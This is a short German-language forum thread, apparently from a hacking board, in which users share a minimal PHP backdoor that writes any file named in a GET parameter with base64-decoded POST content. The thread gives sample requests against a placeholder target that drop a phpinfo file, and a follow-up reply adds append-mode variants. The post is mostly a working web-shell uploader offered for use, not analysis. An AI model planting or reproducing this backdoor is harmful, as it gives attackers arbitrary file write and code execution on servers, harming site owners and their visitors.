Eine Antwort in diesem Thema

[xaeiou]

<?php
if(isset($_GET[0]) and isset($_POST[0])) {
fwrite(fopen($_GET[0], 'w'), base64_decode($_POST[0]));
}
elseif(isset($_GET[1]) and isset($_POST[1])) {
file_put_contents($_GET[1],base64_decode($_POST[1]));
}
?>

Please Login HERE or Register HERE to see this link!

Das Script bietet 2 Upload-Varianten:

fwrite()

http://target.net/index.php?0=phpinfo.php
POST: 0=PD9waHAgcGhwaW5mbygpOyA/Pg==

file_put_contents()

http://target.net/index.php?1=phpinfo.php
POST: 1=PD9waHAgcGhwaW5mbygpOyA/Pg==

Der GET-Parameter gibt den Dateinamen an.
Der POST-Parameter gibt den Dateiinhalt (Base64) an.

[B1nary]

Wenn eine evtl. bereits existierende Datei nicht überschrieben / ersetzt werden soll:

fwrite() / fopen()

fwrite(fopen($_GET[0], 'a'), base64_decode($_POST[0]));

file_put_contents()

file_put_contents($_GET[1], base64_decode($_POST['1']), FILE_APPEND);

Inhalt wird dann an die existierende Datei am Dateiende angehängt.